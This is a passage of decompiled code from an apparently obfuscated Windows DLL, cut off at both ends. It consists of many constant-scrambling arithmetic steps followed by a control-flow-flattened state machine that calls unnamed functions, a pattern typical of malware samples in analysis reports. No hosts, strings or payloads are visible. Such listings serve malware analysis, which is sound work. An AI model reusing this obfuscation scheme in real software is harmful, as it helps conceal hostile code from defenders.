                                                                        				signed int _v596;
                                                                        				signed int _v600;
                                                                        				unsigned int _v604;
                                                                        				signed int _v608;
                                                                        				signed int _v612;
                                                                        				signed int _v616;
                                                                        				intOrPtr _t1166;
                                                                        				intOrPtr _t1180;
                                                                        				intOrPtr _t1220;
                                                                        				intOrPtr _t1265;
                                                                        				void* _t1272;
                                                                        				void* _t1277;
                                                                        				intOrPtr _t1278;
                                                                        				intOrPtr _t1284;
                                                                        				signed int _t1286;
                                                                        				signed int _t1287;
                                                                        				signed int _t1299;
                                                                        				signed int _t1310;
                                                                        				signed int _t1316;
                                                                        				signed int _t1391;
                                                                        				signed int _t1392;
                                                                        				void* _t1397;
                                                                        				signed int _t1399;
                                                                        				signed int _t1400;
                                                                        				signed int _t1401;
                                                                        				signed int _t1402;
                                                                        				signed int _t1403;
                                                                        				signed int _t1404;
                                                                        				signed int _t1405;
                                                                        				signed int _t1406;
                                                                        				signed int _t1407;
                                                                        				signed int _t1408;
                                                                        				signed int _t1409;
                                                                        				signed int _t1410;
                                                                        				signed int _t1411;
                                                                        				signed int _t1412;
                                                                        				signed int _t1413;
                                                                        				signed int _t1414;
                                                                        				signed int _t1415;
                                                                        				signed int _t1416;
                                                                        				signed int _t1417;
                                                                        				signed int _t1418;
                                                                        				signed int _t1419;
                                                                        				signed int _t1424;
                                                                        				signed int _t1428;
                                                                        				void* _t1430;
                                                                        				void* _t1431;
                                                                        				void* _t1433;
                                                                        				void* _t1434;
                                                                        				void* _t1435;
                                                                        
                                                                        				_t1430 = (_t1428 & 0xfffffff8) - 0x268;
                                                                        				_v240 = 0xe54f;
                                                                        				_v240 = _v240 << 1;
                                                                        				_t1290 = 0x24211e99;
                                                                        				_v240 = _v240 ^ 0x0001b603;
                                                                        				_v400 = 0x34e4;
                                                                        				_v400 = _v400 | 0x72f16b66;
                                                                        				_v400 = _v400 ^ 0x4462d2ae;
                                                                        				_v400 = _v400 ^ 0x36938c8e;
                                                                        				_v616 = 0x6c80;
                                                                        				_t1399 = 0x17;
                                                                        				_v616 = _v616 / _t1399;
                                                                        				_v616 = _v616 >> 0xa;
                                                                        				_v616 = _v616 | 0xcaff16ad;
                                                                        				_v616 = _v616 ^ 0xcaff08c2;
                                                                        				_v408 = 0xd461;
                                                                        				_v408 = _v408 + 0xffffc650;
                                                                        				_v408 = _v408 | 0x218aa682;
                                                                        				_v408 = _v408 ^ 0x218ad511;
                                                                        				_v260 = 0x8324;
                                                                        				_v260 = _v260 | 0xdae16db7;
                                                                        				_v260 = _v260 ^ 0xdae19d23;
                                                                        				_v520 = 0x4c7d;
                                                                        				_v520 = _v520 + 0x6bb7;
                                                                        				_v520 = _v520 << 8;
                                                                        				_v520 = _v520 + 0xffffc4e4;
                                                                        				_v520 = _v520 ^ 0x00b7ac0f;
                                                                        				_v412 = 0xf31b;
                                                                        				_v412 = _v412 << 4;
                                                                        				_v412 = _v412 ^ 0x6d93368f;
                                                                        				_v412 = _v412 ^ 0x6d9c5e6e;
                                                                        				_v156 = 0xec47;
                                                                        				_t1400 = 0x68;
                                                                        				_v156 = _v156 / _t1400;
                                                                        				_v156 = _v156 ^ 0x000075fd;
                                                                        				_v324 = 0x34f8;
                                                                        				_v324 = _v324 >> 5;
                                                                        				_v324 = _v324 * 0x44;
                                                                        				_v324 = _v324 ^ 0x00003473;
                                                                        				_v448 = 0xeaa9;
                                                                        				_v448 = _v448 | 0x4138ec1d;
                                                                        				_v448 = _v448 + 0xffff51b1;
                                                                        				_v448 = _v448 ^ 0x41382a1b;
                                                                        				_v176 = 0x21c6;
                                                                        				_v176 = _v176 | 0xc1f8d3e5;
                                                                        				_v176 = _v176 ^ 0xc1f8e639;
                                                                        				_v444 = 0xee7b;
                                                                        				_v444 = _v444 >> 0xc;
                                                                        				_v444 = _v444 + 0xf22d;
                                                                        				_v444 = _v444 ^ 0x00008096;
                                                                        				_v296 = 0xe06f;
                                                                        				_v296 = _v296 << 1;
                                                                        				_v296 = _v296 >> 6;
                                                                        				_v296 = _v296 ^ 0x0000188b;
                                                                        				_v292 = 0x5ebb;
                                                                        				_v292 = _v292 + 0xffff9f3c;
                                                                        				_v292 = _v292 ^ 0xffffc721;
                                                                        				_v536 = 0x7dd7;
                                                                        				_v536 = _v536 | 0xdd9aefff;
                                                                        				_v536 = _v536 * 0x61;
                                                                        				_v536 = _v536 ^ 0xf7ba9ffe;
                                                                        				_v204 = 0x2ee2;
                                                                        				_v204 = _v204 >> 6;
                                                                        				_v204 = _v204 ^ 0x00004145;
                                                                        				_v284 = 0xd043;
                                                                        				_v284 = _v284 ^ 0xcd4d042e;
                                                                        				_v284 = _v284 ^ 0xcd4dca10;
                                                                        				_v248 = 0xa312;
                                                                        				_v248 = _v248 | 0xf3ef4659;
                                                                        				_v248 = _v248 ^ 0xf3efe95d;
                                                                        				_v164 = 0x954d;
                                                                        				_v164 = _v164 << 3;
                                                                        				_v164 = _v164 ^ 0x0004c997;
                                                                        				_v600 = 0xcdd0;
                                                                        				_v600 = _v600 + 0xffffea33;
                                                                        				_v600 = _v600 | 0xea8150e8;
                                                                        				_t1401 = 0xa;
                                                                        				_v600 = _v600 / _t1401;
                                                                        				_v600 = _v600 ^ 0x177330cb;
                                                                        				_v496 = 0xaeea;
                                                                        				_v496 = _v496 ^ 0x492e5da3;
                                                                        				_v496 = _v496 + 0xe542;
                                                                        				_t1402 = 0x58;
                                                                        				_v496 = _v496 / _t1402;
                                                                        				_v496 = _v496 ^ 0x00d4980e;
                                                                        				_v388 = 0xcb07;
                                                                        				_v388 = _v388 >> 8;
                                                                        				_v388 = _v388 | 0x8fee3084;
                                                                        				_v388 = _v388 ^ 0x8fee3c84;
                                                                        				_v308 = 0xcf8f;
                                                                        				_v308 = _v308 + 0xffff2ac0;
                                                                        				_v308 = _v308 + 0xd1ee;
                                                                        				_v308 = _v308 ^ 0x00009d7c;
                                                                        				_v340 = 0x87a6;
                                                                        				_v340 = _v340 | 0xc9feff18;
                                                                        				_v340 = _v340 + 0x4cc1;
                                                                        				_v340 = _v340 ^ 0xc9ff40b0;
                                                                        				_v168 = 0x7db;
                                                                        				_v168 = _v168 << 0xc;
                                                                        				_v168 = _v168 ^ 0x007dfac6;
                                                                        				_v380 = 0x796c;
                                                                        				_v380 = _v380 << 7;
                                                                        				_t1286 = 5;
                                                                        				_t1403 = 0x41;
                                                                        				_v380 = _v380 * 0x2b;
                                                                        				_v380 = _v380 ^ 0x0a32e7b7;
                                                                        				_v236 = 0x93b3;
                                                                        				_v236 = _v236 / _t1286;
                                                                        				_v236 = _v236 ^ 0x00004188;
                                                                        				_v572 = 0xc59a;
                                                                        				_v572 = _v572 | 0x4410790b;
                                                                        				_v572 = _v572 << 8;
                                                                        				_v572 = _v572 ^ 0x77b96c3e;
                                                                        				_v572 = _v572 ^ 0x674485f0;
                                                                        				_v580 = 0x420c;
                                                                        				_v580 = _v580 << 4;
                                                                        				_v580 = _v580 << 0x10;
                                                                        				_v580 = _v580 >> 0xe;
                                                                        				_v580 = _v580 ^ 0x0000e398;
                                                                        				_v516 = 0xad25;
                                                                        				_v516 = _v516 >> 3;
                                                                        				_v516 = _v516 << 7;
                                                                        				_v516 = _v516 + 0x60df;
                                                                        				_v516 = _v516 ^ 0x000b2a6c;
                                                                        				_v524 = 0xdb00;
                                                                        				_v524 = _v524 + 0xfb0;
                                                                        				_v524 = _v524 / _t1403;
                                                                        				_t1404 = 0x5c;
                                                                        				_v524 = _v524 / _t1404;
                                                                        				_v524 = _v524 ^ 0x00003f79;
                                                                        				_v372 = 0xb8ba;
                                                                        				_v372 = _v372 >> 0xe;
                                                                        				_v372 = _v372 ^ 0x000034d2;
                                                                        				_v184 = 0x9f8c;
                                                                        				_v184 = _v184 >> 0xc;
                                                                        				_v184 = _v184 ^ 0x00003128;
                                                                        				_v568 = 0x748c;
                                                                        				_v568 = _v568 + 0xffffb5cb;
                                                                        				_t1391 = 0xf;
                                                                        				_v568 = _v568 / _t1391;
                                                                        				_t1405 = 0x49;
                                                                        				_v568 = _v568 * 0x3a;
                                                                        				_v568 = _v568 ^ 0x0000a9e8;
                                                                        				_v348 = 0xefd4;
                                                                        				_v348 = _v348 ^ 0x6490a2e8;
                                                                        				_v348 = _v348 + 0x9204;
                                                                        				_v348 = _v348 ^ 0x6490c976;
                                                                        				_v500 = 0x6bc0;
                                                                        				_v500 = _v500 >> 7;
                                                                        				_v500 = _v500 << 8;
                                                                        				_v500 = _v500 + 0xc413;
                                                                        				_v500 = _v500 ^ 0x0001f8c3;
                                                                        				_v208 = 0xf6ba;
                                                                        				_v208 = _v208 | 0xdd86999b;
                                                                        				_v208 = _v208 ^ 0xdd86f807;
                                                                        				_v492 = 0xc6a2;
                                                                        				_v492 = _v492 / _t1405;
                                                                        				_v492 = _v492 | 0x8799cdd8;
                                                                        				_v492 = _v492 >> 1;
                                                                        				_v492 = _v492 ^ 0x43cccbf1;
                                                                        				_v344 = 0xa809;
                                                                        				_v344 = _v344 ^ 0xd4f069ef;
                                                                        				_v344 = _v344 + 0x8c1d;
                                                                        				_v344 = _v344 ^ 0xd4f11027;
                                                                        				_v476 = 0x774c;
                                                                        				_t1406 = 0x1b;
                                                                        				_v476 = _v476 * 0x1a;
                                                                        				_v476 = _v476 << 0xf;
                                                                        				_v476 = _v476 ^ 0xc578c338;
                                                                        				_v476 = _v476 ^ 0xcba4ef71;
                                                                        				_v328 = 0xe058;
                                                                        				_v328 = _v328 / _t1406;
                                                                        				_v328 = _v328 * 0x5b;
                                                                        				_v328 = _v328 ^ 0x0002d02b;
                                                                        				_v484 = 0x90c3;
                                                                        				_v484 = _v484 << 0xa;
                                                                        				_v484 = _v484 + 0x315d;
                                                                        				_v484 = _v484 ^ 0xfa7bda49;
                                                                        				_v484 = _v484 ^ 0xf838da10;
                                                                        				_v336 = 0x7823;
                                                                        				_v336 = _v336 + 0x96ed;
                                                                        				_v336 = _v336 ^ 0x41ca6f1d;
                                                                        				_v336 = _v336 ^ 0x41cb5c66;
                                                                        				_v596 = 0x2687;
                                                                        				_v596 = _v596 + 0xffff5b84;
                                                                        				_v596 = _v596 << 0xc;
                                                                        				_v596 = _v596 * 0x1e;
                                                                        				_v596 = _v596 ^ 0x13d4b5f9;
                                                                        				_v604 = 0xa3e9;
                                                                        				_v604 = _v604 ^ 0xfce1bef2;
                                                                        				_v604 = _v604 >> 1;
                                                                        				_v604 = _v604 + 0x89b7;
                                                                        				_v604 = _v604 ^ 0x7e710709;
                                                                        				_v392 = 0xb3d0;
                                                                        				_t1407 = 0x39;
                                                                        				_v392 = _v392 / _t1407;
                                                                        				_v392 = _v392 + 0xffff63f8;
                                                                        				_v392 = _v392 ^ 0xffff4926;
                                                                        				_v612 = 0xdb01;
                                                                        				_v612 = _v612 / _t1391;
                                                                        				_v612 = _v612 + 0xffffd741;
                                                                        				_v612 = _v612 ^ 0xf3cfc17a;
                                                                        				_v612 = _v612 ^ 0x0c30415d;
                                                                        				_v160 = 0x6c3b;
                                                                        				_v160 = _v160 ^ 0x93120bcf;
                                                                        				_v160 = _v160 ^ 0x93125c60;
                                                                        				_v228 = 0x1bde;
                                                                        				_t1408 = 0x35;
                                                                        				_v228 = _v228 / _t1408;
                                                                        				_v228 = _v228 ^ 0x000035bb;
                                                                        				_v472 = 0xabed;
                                                                        				_t1409 = 0x32;
                                                                        				_t1392 = 0x51;
                                                                        				_v472 = _v472 * 0x29;
                                                                        				_v472 = _v472 + 0x6894;
                                                                        				_v472 = _v472 >> 0xe;
                                                                        				_v472 = _v472 ^ 0x00000988;
                                                                        				_v172 = 0xa1fb;
                                                                        				_v172 = _v172 + 0xffff8a08;
                                                                        				_v172 = _v172 ^ 0x00005dc8;
                                                                        				_v220 = 0x89c4;
                                                                        				_v220 = _v220 | 0xdeadcb77;
                                                                        				_v220 = _v220 ^ 0xdeadb5ec;
                                                                        				_v464 = 0x96b9;
                                                                        				_v464 = _v464 | 0xfffea6b7;
                                                                        				_v464 = _v464 >> 2;
                                                                        				_v464 = _v464 ^ 0x3ffff330;
                                                                        				_v420 = 0x8c64;
                                                                        				_v420 = _v420 ^ 0x92bb3353;
                                                                        				_v420 = _v420 >> 0xa;
                                                                        				_v420 = _v420 ^ 0x0024966e;
                                                                        				_v608 = 0x3bdd;
                                                                        				_v608 = _v608 ^ 0x1210bfe3;
                                                                        				_v608 = _v608 << 6;
                                                                        				_v608 = _v608 + 0xffffac04;
                                                                        				_v608 = _v608 ^ 0x842091fd;
                                                                        				_v300 = 0x3554;
                                                                        				_v300 = _v300 + 0xffff6e34;
                                                                        				_v300 = _v300 + 0xffffa25e;
                                                                        				_v300 = _v300 ^ 0xffff3377;
                                                                        				_v216 = 0xd781;
                                                                        				_v216 = _v216 + 0x83c1;
                                                                        				_v216 = _v216 ^ 0x00014c7e;
                                                                        				_v352 = 0x620;
                                                                        				_v352 = _v352 + 0xffffea98;
                                                                        				_v352 = _v352 * 0x35;
                                                                        				_v352 = _v352 ^ 0xfffcb4be;
                                                                        				_v360 = 0x38d8;
                                                                        				_v360 = _v360 / _t1409;
                                                                        				_v360 = _v360 * 0x55;
                                                                        				_v360 = _v360 ^ 0x00004972;
                                                                        				_v508 = 0xeecd;
                                                                        				_v508 = _v508 / _t1392;
                                                                        				_v508 = _v508 ^ 0x9e88c6c6;
                                                                        				_v508 = _v508 >> 6;
                                                                        				_v508 = _v508 ^ 0x027a13af;
                                                                        				_v512 = 0x2962;
                                                                        				_v512 = _v512 | 0x1fe19e9b;
                                                                        				_v512 = _v512 + 0xb3d8;
                                                                        				_v512 = _v512 + 0x6cbd;
                                                                        				_v512 = _v512 ^ 0x1fe2cc8b;
                                                                        				_v396 = 0xb1eb;
                                                                        				_t1410 = 0x6b;
                                                                        				_v396 = _v396 / _t1410;
                                                                        				_v396 = _v396 / _t1286;
                                                                        				_v396 = _v396 ^ 0x00004067;
                                                                        				_v244 = 0xa835;
                                                                        				_t1411 = 0x72;
                                                                        				_v244 = _v244 / _t1411;
                                                                        				_v244 = _v244 ^ 0x000061a1;
                                                                        				_v188 = 0x16ec;
                                                                        				_t1412 = 0x1f;
                                                                        				_t1287 = 0x76;
                                                                        				_v188 = _v188 * 0x30;
                                                                        				_v188 = _v188 ^ 0x00046e13;
                                                                        				_v288 = 0x8858;
                                                                        				_v288 = _v288 + 0x3c92;
                                                                        				_v288 = _v288 ^ 0x0000be40;
                                                                        				_v152 = 0xb749;
                                                                        				_v152 = _v152 / _t1412;
                                                                        				_v152 = _v152 ^ 0x00005040;
                                                                        				_v552 = 0xcb86;
                                                                        				_v552 = _v552 + 0x68d8;
                                                                        				_v552 = _v552 << 0xa;
                                                                        				_v552 = _v552 / _t1287;
                                                                        				_v552 = _v552 ^ 0x000a45a9;
                                                                        				_v504 = 0x5297;
                                                                        				_v504 = _v504 | 0xf03128de;
                                                                        				_v504 = _v504 << 3;
                                                                        				_v504 = _v504 * 0x51;
                                                                        				_v504 = _v504 ^ 0xfd3f05fa;
                                                                        				_v456 = 0x7bf9;
                                                                        				_v456 = _v456 >> 2;
                                                                        				_v456 = _v456 ^ 0x2f0bed7b;
                                                                        				_v456 = _v456 ^ 0x2f0ba3d7;
                                                                        				_v280 = 0xa9aa;
                                                                        				_v280 = _v280 + 0xffff7da9;
                                                                        				_v280 = _v280 ^ 0x000053d7;
                                                                        				_v452 = 0xe54e;
                                                                        				_v452 = _v452 << 9;
                                                                        				_v452 = _v452 / _t1392;
                                                                        				_v452 = _v452 ^ 0x0005d23d;
                                                                        				_v272 = 0xbba1;
                                                                        				_v272 = _v272 * 0x3f;
                                                                        				_v272 = _v272 ^ 0x002e6555;
                                                                        				_v256 = 0x556d;
                                                                        				_v256 = _v256 * 0x4b;
                                                                        				_v256 = _v256 ^ 0x001960ca;
                                                                        				_v480 = 0xc654;
                                                                        				_t1413 = 0x33;
                                                                        				_v480 = _v480 / _t1413;
                                                                        				_v480 = _v480 >> 1;
                                                                        				_v480 = _v480 << 4;
                                                                        				_v480 = _v480 ^ 0x0000558a;
                                                                        				_v432 = 0xa6d1;
                                                                        				_t1414 = 0x78;
                                                                        				_v432 = _v432 / _t1414;
                                                                        				_v432 = _v432 + 0x7c7e;
                                                                        				_v432 = _v432 ^ 0x0000648c;
                                                                        				_v264 = 0x75d3;
                                                                        				_v264 = _v264 ^ 0x9aea9891;
                                                                        				_v264 = _v264 ^ 0x9aeaab3a;
                                                                        				_v428 = 0x6a45;
                                                                        				_v428 = _v428 << 9;
                                                                        				_v428 = _v428 << 0xd;
                                                                        				_v428 = _v428 ^ 0x91400595;
                                                                        				_v364 = 0x6f7d;
                                                                        				_t1415 = 0x4f;
                                                                        				_v364 = _v364 * 0xa;
                                                                        				_v364 = _v364 * 0x2d;
                                                                        				_v364 = _v364 ^ 0x00c3d551;
                                                                        				_v436 = 0x7194;
                                                                        				_v436 = _v436 << 0xe;
                                                                        				_v436 = _v436 << 0xf;
                                                                        				_v436 = _v436 ^ 0x80005fe7;
                                                                        				_v332 = 0x72bf;
                                                                        				_v332 = _v332 >> 3;
                                                                        				_v332 = _v332 ^ 0xbd8bba7a;
                                                                        				_v332 = _v332 ^ 0xbd8bad57;
                                                                        				_v528 = 0xfbe3;
                                                                        				_v528 = _v528 + 0x109e;
                                                                        				_v528 = _v528 << 6;
                                                                        				_v528 = _v528 ^ 0x19958ec7;
                                                                        				_v528 = _v528 ^ 0x19d6e9e1;
                                                                        				_v276 = 0x6210;
                                                                        				_v276 = _v276 << 5;
                                                                        				_v276 = _v276 ^ 0x000c3116;
                                                                        				_v592 = 0x47f3;
                                                                        				_v592 = _v592 + 0xfffff129;
                                                                        				_v592 = _v592 >> 0xd;
                                                                        				_v592 = _v592 * 0x65;
                                                                        				_v592 = _v592 ^ 0x000023dc;
                                                                        				_v368 = 0x5e76;
                                                                        				_v368 = _v368 << 1;
                                                                        				_v368 = _v368 + 0xffffebab;
                                                                        				_v368 = _v368 ^ 0x0000f9a9;
                                                                        				_v540 = 0xb1ba;
                                                                        				_v540 = _v540 + 0xffff2f03;
                                                                        				_v540 = _v540 ^ 0x456dd435;
                                                                        				_v540 = _v540 / _t1415;
                                                                        				_v540 = _v540 ^ 0x025c94ea;
                                                                        				_v488 = 0xa3a0;
                                                                        				_v488 = _v488 | 0x29558c36;
                                                                        				_v488 = _v488 * 0x52;
                                                                        				_v488 = _v488 >> 7;
                                                                        				_v488 = _v488 ^ 0x007a9d5c;
                                                                        				_v404 = 0xbd87;
                                                                        				_v404 = _v404 | 0x1f6fe8ad;
                                                                        				_v404 = _v404 + 0xffff44e1;
                                                                        				_v404 = _v404 ^ 0x1f6f0020;
                                                                        				_v252 = 0x32cd;
                                                                        				_v252 = _v252 + 0xffff80e8;
                                                                        				_v252 = _v252 ^ 0xffffc7ba;
                                                                        				_v576 = 0xf940;
                                                                        				_v576 = _v576 + 0xffffa78d;
                                                                        				_t1416 = 0x22;
                                                                        				_v576 = _v576 * 0x6d;
                                                                        				_v576 = _v576 << 0xf;
                                                                        				_v576 = _v576 ^ 0x3ba4bc13;
                                                                        				_v468 = 0xcb5;
                                                                        				_v468 = _v468 << 0xe;
                                                                        				_v468 = _v468 >> 1;
                                                                        				_v468 = _v468 / _t1416;
                                                                        				_v468 = _v468 ^ 0x000bb40c;
                                                                        				_v192 = 0xcc11;
                                                                        				_v192 = _v192 + 0xffffa2c3;
                                                                        				_v192 = _v192 ^ 0x0000460e;
                                                                        				_v320 = 0xf96;
                                                                        				_v320 = _v320 << 1;
                                                                        				_v320 = _v320 ^ 0xa5b2d99c;
                                                                        				_v320 = _v320 ^ 0xa5b2df36;
                                                                        				_v200 = 0xbc2;
                                                                        				_v200 = _v200 + 0xa28e;
                                                                        				_v200 = _v200 ^ 0x0000f021;
                                                                        				_v548 = 0xe226;
                                                                        				_v548 = _v548 << 3;
                                                                        				_v548 = _v548 ^ 0x4c92e9f4;
                                                                        				_v548 = _v548 ^ 0x6d88dd25;
                                                                        				_v548 = _v548 ^ 0x211d7baa;
                                                                        				_v556 = 0xc029;
                                                                        				_v556 = _v556 | 0xafe7faac;
                                                                        				_t1417 = 3;
                                                                        				_v556 = _v556 * 0x29;
                                                                        				_v556 = _v556 + 0x66dc;
                                                                        				_v556 = _v556 ^ 0x2c2783fd;
                                                                        				_v564 = 0xcddf;
                                                                        				_v564 = _v564 | 0x69cce809;
                                                                        				_v564 = _v564 + 0x1c8f;
                                                                        				_v564 = _v564 | 0x9b91da16;
                                                                        				_v564 = _v564 ^ 0xfbddf591;
                                                                        				_v376 = 0xdbf0;
                                                                        				_v376 = _v376 + 0xffff5ef6;
                                                                        				_v376 = _v376 + 0x881a;
                                                                        				_v376 = _v376 ^ 0x00009a9f;
                                                                        				_v584 = 0x284;
                                                                        				_v584 = _v584 << 0xa;
                                                                        				_v584 = _v584 + 0xffffb7a6;
                                                                        				_v584 = _v584 / _t1417;
                                                                        				_v584 = _v584 ^ 0x0003190f;
                                                                        				_v196 = 0x43cc;
                                                                        				_v196 = _v196 << 6;
                                                                        				_v196 = _v196 ^ 0x0010940d;
                                                                        				_v268 = 0xd3cd;
                                                                        				_v268 = _v268 << 3;
                                                                        				_v268 = _v268 ^ 0x0006aa73;
                                                                        				_v356 = 0xfeac;
                                                                        				_v356 = _v356 + 0x19fd;
                                                                        				_v356 = _v356 ^ 0xd0ef3018;
                                                                        				_v356 = _v356 ^ 0xd0ee4147;
                                                                        				_v304 = 0x8b2f;
                                                                        				_v304 = _v304 << 3;
                                                                        				_v304 = _v304 | 0x216bae77;
                                                                        				_v304 = _v304 ^ 0x216fb82e;
                                                                        				_v312 = 0x842;
                                                                        				_v312 = _v312 + 0xffffcb0b;
                                                                        				_v312 = _v312 + 0xffff0185;
                                                                        				_v312 = _v312 ^ 0xfffece92;
                                                                        				_v180 = 0x445;
                                                                        				_v180 = _v180 >> 0xd;
                                                                        				_v180 = _v180 ^ 0x00004e36;
                                                                        				_v560 = 0x7ecd;
                                                                        				_v560 = _v560 | 0x1b6ab905;
                                                                        				_v560 = _v560 * 0x14;
                                                                        				_v560 = _v560 + 0xffff090e;
                                                                        				_v560 = _v560 ^ 0x245b1838;
                                                                        				_v316 = 0xf7be;
                                                                        				_t1418 = 0x31;
                                                                        				_v316 = _v316 / _t1418;
                                                                        				_v316 = _v316 + 0x4e32;
                                                                        				_v316 = _v316 ^ 0x0000257f;
                                                                        				_v460 = 0x4b6c;
                                                                        				_v460 = _v460 << 0xf;
                                                                        				_v460 = _v460 | 0x579879a9;
                                                                        				_t1419 = 0x15;
                                                                        				_v460 = _v460 * 0x69;
                                                                        				_v460 = _v460 ^ 0x1d1f909c;
                                                                        				_v532 = 0x5c00;
                                                                        				_v532 = _v532 ^ 0x1c3d3198;
                                                                        				_v532 = _v532 + 0x1b65;
                                                                        				_v532 = _v532 | 0x76fabaf6;
                                                                        				_v532 = _v532 ^ 0x7effbaff;
                                                                        				_v224 = 0x4730;
                                                                        				_v224 = _v224 / _t1419;
                                                                        				_v224 = _v224 ^ 0x013462ab;
                                                                        				_v232 = 0xd2aa;
                                                                        				_v232 = _v232 * 0xf;
                                                                        				_v232 = _v232 ^ 0x000c4086;
                                                                        				_v212 = 0xc9c0;
                                                                        				_v212 = _v212 >> 2;
                                                                        				_v212 = _v212 ^ 0x00003271;
                                                                        				_v588 = 0x8e1e;
                                                                        				_v588 = _v588 << 0xe;
                                                                        				_v588 = _v588 / _t1287;
                                                                        				_v588 = _v588 + 0x70b0;
                                                                        				_v588 = _v588 ^ 0x004d8aec;
                                                                        				_v384 = 0x3f9a;
                                                                        				_v384 = _v384 ^ 0xaa043434;
                                                                        				_v384 = _v384 + 0xffff10d6;
                                                                        				_v384 = _v384 ^ 0xaa0303c4;
                                                                        				_v440 = 0x7da4;
                                                                        				_v440 = _v440 ^ 0xe798b77d;
                                                                        				_v440 = _v440 >> 3;
                                                                        				_v440 = _v440 ^ 0x1cfea2fb;
                                                                        				_v544 = 0x6835;
                                                                        				_v544 = _v544 ^ 0xbf0c3147;
                                                                        				_v544 = _v544 >> 7;
                                                                        				_v544 = _v544 << 6;
                                                                        				_v544 = _v544 ^ 0x5f88d8a0;
                                                                        				_v424 = 0x3a6a;
                                                                        				_v424 = _v424 | 0x20761b11;
                                                                        				_v424 = _v424 << 5;
                                                                        				_v424 = _v424 ^ 0x0ec760c0;
                                                                        				_v416 = 0x5aa4;
                                                                        				_v416 = _v416 >> 0xa;
                                                                        				_v416 = _v416 >> 5;
                                                                        				_v416 = _v416 ^ 0x00001f40;
                                                                        				while(1) {
                                                                        					L1:
                                                                        					_t1166 = 0x1347b7a7;
                                                                        					do {
                                                                        						while(1) {
                                                                        							L2:
                                                                        							_t1433 = _t1290 - 0x18f54dcc;
                                                                        							if(_t1433 > 0) {
                                                                        								break;
                                                                        							}
                                                                        							if(_t1433 == 0) {
                                                                        								E1000A176();
                                                                        								E1000164C();
                                                                        								asm("sbb ecx, ecx");
                                                                        								_t1290 = (_t1290 & 0xecdae413) + 0x3448ab6b;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							_t1434 = _t1290 - 0xcc27a1e;
                                                                        							if(_t1434 > 0) {
                                                                        								__eflags = _t1290 - _t1166;
                                                                        								if(__eflags > 0) {
                                                                        									__eflags = _t1290 - 0x16c53265;
                                                                        									if(_t1290 == 0x16c53265) {
                                                                        										_t1166 = E1001B3FE();
                                                                        										__eflags = _t1166;
                                                                        										if(_t1166 == 0) {
                                                                        											L109:
                                                                        											return _t1166;
                                                                        										}
                                                                        										_t1290 = 0x18f54dcc;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t1166 = 0x1347b7a7;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        									__eflags = _t1290 - 0x17309102;
                                                                        									if(_t1290 == 0x17309102) {
                                                                        										E100155FA( &_v80, _v512, _v396);
                                                                        										_t1290 = 0x17c2b24e;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t1166 = 0x1347b7a7;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        									__eflags = _t1290 - 0x17a0c50f;
                                                                        									if(_t1290 == 0x17a0c50f) {
                                                                        										E1001B1D2();
                                                                        										_t1290 = 0xcc27a1e;
                                                                        										while(1) {
                                                                        											L1:
                                                                        											_t1166 = 0x1347b7a7;
                                                                        											goto L2;
                                                                        										}
                                                                        									}
                                                                        									__eflags = _t1290 - 0x17c2b24e;
                                                                        									if(_t1290 != 0x17c2b24e) {
                                                                        										goto L104;
                                                                        									}
                                                                        									E10014693( &_v112, _v244,  &_v132, _v188);
                                                                        									_pop(_t1310);
                                                                        									asm("sbb ecx, ecx");
                                                                        									_t1290 = (_t1310 & 0xf343a4d6) + 0x28b834f4;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								if(__eflags == 0) {
                                                                        									_t1166 = E1000421E();
                                                                        									goto L109;
                                                                        								}
                                                                        								__eflags = _t1290 - 0xd04e189;
                                                                        								if(_t1290 == 0xd04e189) {
                                                                        									E100091CD(_v488, _v404, _v252, _v140, _v576);
                                                                        									_t1430 = _t1430 + 0xc;
                                                                        									L44:
                                                                        									_t1290 = 0x2e96a45f;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0xef17693;
                                                                        								if(_t1290 == 0xef17693) {
                                                                        									E10006BC0();
                                                                        									asm("sbb ecx, ecx");
                                                                        									_t1290 = (_t1290 & 0xfc14d350) + 0x4381151;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0x124b7e54;
                                                                        								if(_t1290 == 0x124b7e54) {
                                                                        									_t1166 = E10009CC8();
                                                                        									__eflags = _t1166;
                                                                        									if(_t1166 == 0) {
                                                                        										goto L109;
                                                                        									}
                                                                        									E100177B8(_v520);
                                                                        									_t1290 = 0xef17693;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0x1314054e;
                                                                        								if(_t1290 != 0x1314054e) {
                                                                        									goto L104;
                                                                        								}
                                                                        								E100091CD(_v584, _v196, _v268, _v88, _v356);
                                                                        								_t1430 = _t1430 + 0xc;
                                                                        								L39:
                                                                        								_t1290 = 0x1d3feeae;
                                                                        								while(1) {
                                                                        									L1:
                                                                        									_t1166 = 0x1347b7a7;
                                                                        									goto L2;
                                                                        								}
                                                                        							}
                                                                        							if(_t1434 == 0) {
                                                                        								_t1290 = 0x30bd18dd;
                                                                        								continue;
                                                                        							}
                                                                        							_t1435 = _t1290 - 0x679c612;
                                                                        							if(_t1435 > 0) {
                                                                        								__eflags = _t1290 - 0xa42f83d;
                                                                        								if(_t1290 == 0xa42f83d) {
                                                                        									_v72 = E100089BA();
                                                                        									_t1290 = 0xc79baa;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0xaae0b9b;
                                                                        								if(_t1290 == 0xaae0b9b) {
                                                                        									E1001990E();
                                                                        									_t1290 = 0x28928226;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t1166 = 0x1347b7a7;
                                                                        										goto L2;
                                                                        									}
                                                                        								}
                                                                        								__eflags = _t1290 - 0xaff942a;
